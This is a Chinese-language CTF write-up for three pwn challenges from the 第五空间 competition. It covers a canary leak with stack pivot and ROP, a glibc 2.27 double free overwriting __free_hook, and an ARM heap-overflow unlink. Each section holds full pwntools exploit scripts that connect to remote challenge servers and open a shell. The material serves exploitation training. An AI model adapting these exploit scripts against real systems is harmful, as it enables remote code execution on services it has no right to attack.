第五空间

我是一只懒狗,起床为了吃饭,吃饭为了睡觉,睡觉为了起床

twice

read 没有用 0 截断输入，所以 puts 会把栈地址和 canary 值一起打印出来；然后第二轮修改 rbp 的值，用 leave_ret 做栈迁移（此处是抬栈），接着执行上方布置好的 ROP 链。

from pwn import *

context.log_level = 'DEBUG'

# The local process handle is overwritten by the remote connection on the
# next line, so the spawned './main' child is neither used nor closed.
p = process('./main')
p = remote('121.36.59.116', 9999)
elf = ELF('./main')
libc = ELF('./libc-2.23.so')

# Gadget addresses inside ./main, taken as-is from the original script.
pop_rdi_ret = 0x0000000000400923
leave_ret = 0x0000000000400879

MARK = 'FMYY'


def leak_addr():
    """Read up to the next 0x7F byte and unpack the preceding 6 bytes as a little-endian address."""
    return u64(p.recvuntil('\x7F')[-6:].ljust(8, '\x00'))


# Round 1: the input is not NUL-terminated (see the write-up text), so the echo
# after the marker contains 7 bytes of the canary (low byte restored to 0 by
# rjust) followed by a stack address.
p.sendafter('>', 'U' * 0x55 + MARK)
p.recvuntil(MARK)
canary = u64(p.recv(7).rjust(8, '\x00'))
stack = leak_addr()
log.info('Canary:\t' + hex(canary))
log.info('Stack:\t' + hex(stack))

# Round 2: chain puts(got['puts']) and a return to main, keep the canary intact,
# point rbp at stack - 0x78 and let leave_ret pivot onto the chain.
rop = p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])
payload = rop.ljust(0x58, '\x00') + p64(canary) + p64(stack - 0x78) + p64(leave_ret)
p.sendafter('>', payload)
libc_base = leak_addr() - libc.sym['puts']
log.info('LIBC:\t' + hex(libc_base))

# Computed but not used in the final payload (kept from the original script).
system = libc.sym['system'] + libc_base
binsh = libc.search('/bin/sh').next() + libc_base
# Fixed libc-2.23 offset copied from the original script; not derived here.
rce = libc_base + 0x4526A

# Round 3: answer the first prompt with the marker, then send the filler,
# the canary, 8 more filler bytes and rce.
p.sendafter('>', MARK)
p.sendafter('>', 'U' * 0x58 + p64(canary) + 'U' * 0x8 + p64(rce))
p.interactive()

OF

给了源码，但源码和远程编译出来的文件并不一致；本质是 glibc 2.27 下一个简单的 double free。

from pwn import *

# Verbose pwntools logging for the whole session.
context.log_level = 'DEBUG'
def new(index):
    """Select menu option 1 and answer the Index prompt with `index` (uses the global connection `p`)."""
    for prompt, reply in (('choice:', '1'), ('Index:', str(index))):
        p.sendlineafter(prompt, reply)
def edit(index, content):
    """Select menu option 2, answer the Index prompt, then send `content` raw after 'Content:' (uses the global `p`)."""
    for prompt, reply in (('choice:', '2'), ('Index:', str(index))):
        p.sendlineafter(prompt, reply)
    p.sendafter('Content:', content)
def show(index):
    """Select menu option 3 and answer the Index prompt with `index` (uses the global connection `p`)."""
    for prompt, reply in (('choice:', '3'), ('Index:', str(index))):
        p.sendlineafter(prompt, reply)
def free(index):
    """Select menu option 4 and answer the Index prompt with `index` (uses the global connection `p`)."""
    for prompt, reply in (('choice:', '4'), ('Index:', str(index))):
        p.sendlineafter(prompt, reply)
# As in the first script, the local process handle is immediately replaced by
# the remote connection and the spawned child is never closed.
p = process('./main')
p = remote('121.36.74.70', 9999)
libc = ELF('./libc-2.27.so')

# Allocate slots 0..8, free slots 0..7, then allocate slots 0..7 again
# (same call sequence as the original's split loops).
for idx in range(9):
    new(idx)
for idx in range(8):
    free(idx)
for idx in range(8):
    new(idx)

# Show slot 7 and turn the pointer it prints into the libc base, using the
# __malloc_hook-relative offsets from the original script.
show(7)
leaked = u64(p.recvuntil('\x7F')[-6:].ljust(8, '\x00'))
libc_base = leaked - libc.sym['__malloc_hook'] - 0x60 - 0x10
log.info('LIBC:\t' + hex(libc_base))

rce = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh').next()  # computed but unused
free_hook = libc_base + libc.sym['__free_hook']

# Second free of slot 7 (the double free noted in the write-up); the remaining
# steps are kept exactly as in the original script.
free(7)
edit(7, p64(free_hook))
new(8)
new(9)
edit(9, p64(rce))
edit(0, '/bin/sh\x00')
free(0)
p.interactive()

easypwn

# Run the ARM binary under qemu-user with a gdb stub listening on port 1234,
# using the current directory as the library/sysroot prefix.
$ qemu-arm -g 1234 -L . ./main
# Then, from a gdb session, attach to that stub.
$ gdb > target remote localhost:1234

按上述方式进行调试。漏洞是堆溢出，最终通过 unlink 实现任意写。

from pwn import *

# Verbose pwntools logging for the whole session.
context.log_level = 'DEBUG'
def new(size, content):
    """Select menu option 2, answer the Length prompt with `size`, then send `content` raw after 'Tag:' (uses the global `p`)."""
    for prompt, reply in (('>>> ', '2'), ('Length:', str(size))):
        p.sendlineafter(prompt, reply)
    p.sendafter('Tag:', content)
def show():
    """Select menu option 1 on the global connection `p`."""
    p.sendlineafter('>>> ', '1')
def edit(index, size, content):
    """Select menu option 3, answer the Index and Length prompts, then send `content` raw after 'Tag:' (uses the global `p`)."""
    for prompt, reply in (('>>> ', '3'), ('Index:', str(index)), ('Length:', str(size))):
        p.sendlineafter(prompt, reply)
    p.sendafter('Tag:', content)
def free(index):
    """Select menu option 4; as in the original, the index is sent in reply to the 'Tag:' prompt (uses the global `p`)."""
    for prompt, reply in (('>>> ', '4'), ('Tag:', str(index))):
        p.sendlineafter(prompt, reply)
# The local qemu handle is replaced by the remote connection right after it is
# created, so the spawned qemu child is never used or closed; `elf` is unused.
p = process('qemu-arm -g 1234 -L . ./main', shell=True)
elf = ELF('./main')
p = remote('121.36.58.215', 1337)

# Earlier attempt kept by the author. In the original script it was disabled
# by wrapping it in a string literal; it is reproduced here as comments and
# is likewise never executed.
# new(0x10,'FMYY')
# new(0x38,'FMYY')
# new(0x38,'FMYY')
# new(0x38,'FMYY')
# new(0x10,'FMYY')
# edit(0,0x18,'\x00'*0x14 + p32(0xC1))
# free(1)
# new(0x38,'FMYY') #2
# show()
# p.recvuntil('2 : ')
# libc_base = u32(p.recv(4)) - 0x9A8EC
# log.success('LIBC:\t' + hex(libc_base))
# system = libc_base + 0x51800
# new(0x38,'FMYY')
# new(0x38,'FMYY')
#
# free(2)
# free(5)
# free(0)

new(0x10, 'FMYY')
new(0x60, 'FMYY')
new(0x10, 'FMYY')

# Data written into slot 0 for the unlink step described in the write-up.
# The 0x2106C-relative values are binary-specific constants copied from the
# original script; they are not derived here.
payload = p32(0) + p32(0x20) + p32(0x2106C - 0xC) + p32(0x2106C - 8) + p32(0x10) + p32(0x68)
edit(0, 0x18, payload)
free(1)

# Second write into slot 0 and a 4-byte write into slot 1, again with
# constants (0x2100C, 0x21038, 0x21030, 0x103E4) taken from the original.
edit(0, 0x20, p64(0) + p32(0x10) + p32(0x2100C) + p32(0x10) + p32(0x21038) + p32(0x10) + p32(0x21030))
edit(1, 4, p32(0x103E4))
free(0)

# The 4 bytes received after free(0) are the leak; 0x355B4 and 0x51800 are
# libc offsets from the original script.
libc_base = u32(p.recv(4)) - 0x355B4
log.success('LIBC:\t' + hex(libc_base))
system = libc_base + 0x51800
edit(2, 4, p32(system))
p.sendline('sh')
p.interactive()